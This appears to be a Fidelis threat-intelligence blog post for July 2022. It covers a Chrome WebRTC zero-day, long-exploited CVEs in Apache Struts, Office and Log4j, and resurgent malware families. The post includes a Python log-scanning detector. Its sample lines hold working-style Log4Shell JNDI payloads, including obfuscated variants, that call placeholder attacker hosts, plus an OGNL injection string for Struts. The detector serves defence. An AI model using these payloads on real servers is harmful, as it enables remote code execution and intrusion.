Amol Sarwate heads the Fidelis and CloudPassage worldwide threat and security research lab, responsible for network, endpoint and cloud. He has devoted his career to protecting, securing, and educating...
August 5, 2022
July 2022 Threat Intelligence Summary
The Latest Insights from the Fidelis Threat Research Team
The Fidelis Cybersecurity Threat Research Team’s latest report shows a shifting threat landscape that includes the resurgence of familiar threats, alongside new, widespread vulnerabilities in leading internet browsers that affected billions of users worldwide. Fidelis Cybersecurity provides continued coverage and vigilance on the most menacing threats and vulnerabilities, to keep your organization protected against current threats and allow you to stay ahead of whatever comes next.
A Zero-day Exploit Poses Threat to Billions Worldwide
CVE-2022-2294, a heap buffer overflow in the WebRTC component, was the fourth Google Chrome zero-day of 2022 to be exploited in the wild. The high-severity flaw was used in targeted attacks to deliver sophisticated spyware. Because the affected WebRTC code is shared beyond Chromium, Microsoft and Apple patched the same bug in their Edge and Safari browsers, respectively; users of all three browsers are urged to update.
Each month presents a new set of challenges for cybersecurity defenders, as adversaries adapt existing threats and create new tactics and techniques. In July 2022, Fidelis Cybersecurity enabled clients to defend their networks and clouds from more than 276,155 high-severity malware threats, including ransomware, trojans, backdoors, exploit kits, loaders, and droppers. Additionally, Fidelis Cybersecurity helped customers fend off over 438 exploitation attempts across 20 distinct high-profile vulnerabilities.
Most Active Vulnerabilities
As usual, we see a lot of older vulnerabilities in our telemetry. This month, the predominant vulnerability tracked through our telemetry was a Remote Code Execution (RCE) vulnerability in Apache Struts (CVE-2018-11776), which affects Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16. Other notable CVEs identified in Fidelis telemetry included CVE-2017-0199, which allows arbitrary code execution through the OLE2Link handler on unpatched Microsoft Office and WordPad installations, and CVE-2021-44228, the Log4Shell flaw in Log4j2 that continues to be exploited. Exploitation of these long-standing CVEs highlights the importance of real-time alerting and continual patching.
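As an added illustration of the real-time alerting this paragraph calls for (example code written for this page, not Fidelis telemetry or product logic), the script below scans constructed web-server log lines for the two web-facing CVEs named above: CVE-2021-44228 (a `${jndi:...}` lookup, including the nested-lookup obfuscations seen in the wild) and CVE-2018-11776 (an OGNL expression in the namespace portion of a Struts action URL). The log lines, IP addresses and paths are made up; CVE-2017-0199 is delivered as an Office document and is not visible in web logs, so it is not covered here.

```python
"""Heuristic log-line detector for CVE-2021-44228 and CVE-2018-11776.

Added example for this page; the sample log lines below are constructed,
not real telemetry. The regexes are deliberately narrow heuristics, not
a complete signature set.
"""
import re
from urllib.parse import unquote

# Constructed sample log lines in combined log format (not real traffic).
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Jul/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    # CVE-2018-11776: URL-encoded OGNL expression in the Struts namespace
    '10.0.0.9 - - [12/Jul/2022:10:02:11 +0000] "GET /%24%7B%28%23_memberAccess'
    '%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29%7D/actionChain1.action '
    'HTTP/1.1" 302 0 "-" "curl/7.68.0"',
    # CVE-2021-44228: plain JNDI lookup string in the User-Agent header
    '10.0.0.7 - - [12/Jul/2022:10:03:45 +0000] "GET /login HTTP/1.1" 200 128 '
    '"-" "${jndi:ldap://198.51.100.1:1389/a}"',
    # CVE-2021-44228: same lookup obfuscated with nested ${lower:} / ${::-} tricks
    '10.0.0.8 - - [12/Jul/2022:10:04:10 +0000] "GET /login HTTP/1.1" 200 128 '
    '"-" "${${lower:j}${::-n}${::-d}i:rmi://198.51.100.2/x}"',
]

# ${lower:x} / ${upper:x} -> x
_NESTED = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
# ${anything:-x} (including the bare ${::-x} form) -> x
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

# After normalisation, a JNDI lookup with one of the schemes attackers use.
JNDI = re.compile(r"\$\{jndi:(?:ldaps?|rmi|dns|iiop|corba|nds|http)")
# Request path holding an OGNL "${...}" or "%{...}" before a .action mapping.
OGNL_NS = re.compile(r'"(?:get|post|put|head) /[^" ]*[$%]\{[^" ]*\.action')


def normalize(line: str) -> str:
    """URL-decode repeatedly, fold nested Log4j lookups, then lowercase."""
    prev = None
    while prev != line:          # attackers double- and triple-encode
        prev = line
        line = unquote(line)
    prev = None
    while prev != line:          # innermost lookups resolve first
        prev = line
        line = _NESTED.sub(r"\1", line)
        line = _DEFAULT.sub(r"\1", line)
    return line.lower()


def classify(line: str) -> list:
    """Return the CVE identifiers whose heuristics match this log line."""
    norm = normalize(line)
    hits = []
    if JNDI.search(norm):
        hits.append("CVE-2021-44228")
    if OGNL_NS.search(norm):
        hits.append("CVE-2018-11776")
    return hits


def scan(lines) -> dict:
    """Map line index -> matched CVEs, for every line that triggered a rule."""
    result = {}
    for idx, line in enumerate(lines):
        hits = classify(line)
        if hits:
            result[idx] = hits
    return result


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOGS).items():
        print(f"line {idx}: {', '.join(hits)}")
```

The normalisation step is the part worth copying: a detector that matches the literal string `${jndi:` misses the nested-lookup variants, while one that folds `${lower:j}` and `${::-n}` first catches the common obfuscations with a single rule. Both regexes are heuristics and should sit beside patch status, not replace it.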
This month’s trending malware saw a resurgence of existing threats, including the Vobfus family of worms, the XorDDoS and Gafgyt distributed denial of service (DDoS) malware families, and the Prometei multi-stage cryptomining botnet. While these are all older malware, they still pose a high level of threat and can do significant damage to affected organizations. Be sure you have the latest information on how to detect and respond quickly so you can stay ahead of cyber adversaries.
About the Fidelis Cybersecurity Threat Research Team
The Threat Research team (TRT) at Fidelis Cybersecurity researches and analyzes the latest threats and issues. The intelligence we gather from multiple open-source and proprietary sources about our cyber adversaries’ tactics, techniques, and procedures (TTPs) is fed directly into our platforms, products, and services to help our customers detect, neutralize, and eliminate threats before they can harm production systems.
Visit the Fidelis Cybersecurity Threat Research page to read the complete July 2022 Threat Intelligence Summary, along with information on critical threats and resources to help you better prepare for the next attack.
See Fidelis platforms in action. Learn how our fast, scalable Fidelis Elevate and Fidelis CloudPassage Halo platforms provide deep insights into the SOC to help security teams worldwide protect, detect, respond, and neutralize even the most advanced cyber adversaries.